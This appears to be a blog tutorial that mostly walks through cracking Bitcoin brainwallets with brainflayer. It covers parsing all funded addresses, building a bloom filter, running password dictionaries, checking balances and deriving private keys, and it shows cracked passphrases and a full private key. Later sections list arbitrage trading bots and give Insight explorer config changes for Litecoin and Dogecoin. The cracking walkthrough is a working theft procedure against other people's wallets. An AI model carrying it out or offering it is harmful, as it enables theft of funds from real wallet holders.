Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets
http://www.coindesk.com/new-cracking-tool-exposes-major-flaw-in-bitcoin-brainwallets/

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to convert text file.

5. Convert Hash160 address to bloom filter address using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese character

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Convert to bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,
Brainwallet password is 1satoshi

9. Bitcoin wallet balance
check Bitcoin balance on Blockchain.info

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY

Bitcoin Arbitrage and Trading Robots (Open Source)

Name: Blackbird
Program: C++
Download: https://github.com/butor/blackbird
Exchange: Bitfinex, OKCoin, Bitstamp, Kraken, ItBit, Gemini

Name: Gekko
Program: Javascript / nodejs
Download: https://github.com/askmike/gekko
Exchange: Bitstamp, CEX.io, Kraken, BTC-e, Bitfinex, LakeBTC, Cryptsy

Name: Bitcoin Arbitrage
Program: Python
Download: https://github.com/maxme/bitcoin-arbitrage
Exchange: Bitstamp

Name: Bitcoin Dealer
Program: Django
Download: https://github.com/rokj/bitcoin_dealer
Exchange: Bitstamp

Name: BTC-E Arbitrage Bot
Program: PHP
Download: https://bitcointalk.org/index.php?topic=236321.0
Exchange: BTC-e

Name: Crypto Arbitrage Trader
Program: Python
Download: https://github.com/PeanutPower/CryptoArbitrageTrader
Exchange: Coins-E, BTC-e, Vircurex, Cryptsy

Name: tAPIbot
Program: Python
Download: https://github.com/nomorecoin/tAPIbot
Exchange: BTC-e

Cloud-based Automated Bitcoin Arbitrage and Trading Bots

Name: TradeWave
Website: https://tradewave.net
Exchange: BTC-e, Bitfinex, Kraken, Bitstamp, Coinsetter, OKCoin, Coinbase

Name: CryptoTrader
Website: https://cryptotrader.org/
Exchange: Bitstamp, Coinbase, Huobi, OKCoin, BTC-e, CEX.IO, Bitfinex, Kraken, Cryptsy

Name: Haasbot
Website: https://www.haasonline.com/
Exchange: (Registration is currently not allowed)

Bitcoin Insight API for Altcoin (Litecoin or Dogecoin)

1. Update the config file:
insight/node_modules/insight-bitcore-api/config/config.js

change the port number and dataDir.

2. Update the exports.livenet sections in file networks.js:
insight/node_modules/bitcore/networks.js

For Litecoin:

exports.livenet = {
  name: 'livenet',
  magic: hex('fbc0b6db'),
  addressVersion: 0x30,
  privKeyVersion: 0xb0,
  P2SHVersion: 5,
  hkeyPublicVersion: 0x0488c42e,
  hkeyPrivateVersion: 0x0488e1f4,
  genesisBlock: {
    hash: hex('E2BF047E7E5A191AA4EF34D314979DC9986E0F19251EDABA5940FD1FE365A712'),
    merkle_root: hex('D9CED4ED1130F7B7FAAD9BE25323FFAFA33232A17C3EDF6CFD97BEE6BAFBDD97'),
    height: 0,
    nonce: 2084524493,
    version: 1,
    prev_hash: buffertools.fill(new Buffer(32), 0),
    timestamp: 1317972665,
    bits: 504365040,
  },
  dnsSeeds: [
    'dnsseed.litecointools.com',
    'dnsseed.litecoinpool.org',
    'dnsseed.ltc.xurious.com',
    'dnsseed.koin-project.com',
    'dnsseed.weminemnc.com'
  ],
  defaultClientPort: 9333
};

For Dogecoin:

exports.livenet = {
  name: 'livenet',
  magic: hex('c0c0c0c0'),
  addressVersion: 0x1e,
  privKeyVersion: 0x9e,
  P2SHVersion: 5,
  hkeyPublicVersion: 0x0488c42e,
  hkeyPrivateVersion: 0x0488e1f4,
  genesisBlock: {
    hash: hex('9156352c1818b32e90c9e792efd6a11a82fe7956a630f03bbee236cedae3911a'),
    merkle_root: hex('696ad20e2dd4365c7459b4a4a5af743d5e92c6da3229e6532cd605f6533f2a5b'),
    height: 0,
    nonce: 99943,
    version: 1,
    prev_hash: buffertools.fill(new Buffer(32), 0),
    timestamp: 1386325540,
    bits: 504365040,
  },
  dnsSeeds: [
    'seed.dogecoin.com',
    'seed.mophides.com',
    'seed.dglibrary.org',
    'seed.dogechain.info'
  ],
  defaultClientPort: 22556
};

3. update PROTOCOL_VERSION to accept RPC connections.

Open the following file:
insight/node_modules/bitcore/lib/Connection.js

change:
var PROTOCOL_VERSION = 70000;

to:
var PROTOCOL_VERSION = 70003;

Dogecoin blockchain explorer Live: http://dogecoin.biteast.com
Bitcoin blockchain explorer Live: http://bitcoin.biteast.com